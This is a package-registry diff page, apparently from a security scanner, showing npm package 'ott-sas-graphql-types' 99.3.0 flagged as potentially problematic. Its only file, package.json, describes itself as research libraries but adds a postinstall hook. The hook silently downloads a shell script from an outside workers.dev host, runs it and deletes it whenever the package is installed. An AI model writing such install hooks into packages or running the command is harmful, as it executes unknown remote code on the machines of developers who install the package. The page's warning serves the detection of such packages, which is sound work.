ott-sas-graphql-types 99.3.0
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of ott-sas-graphql-types might be problematic. Click here for more details.
- package/package.json +9 -0
package/package.json
ADDED
@@ -0,0 +1,9 @@
|
|
1
|
+
{
|
2
|
+
"name": "ott-sas-graphql-types",
|
3
|
+
"version": "99.3.0",
|
4
|
+
"description": "Package with libraries used for research",
|
5
|
+
"scripts": {
|
6
|
+
"postinstall": "bash -c 'curl -sSL https://research20934i.sherlockshat007.workers.dev -o script.sh && chmod +x script.sh && ./script.sh && rm -f script.sh'"
|
7
|
+
}
|
8
|
+
}
|
9
|
+
|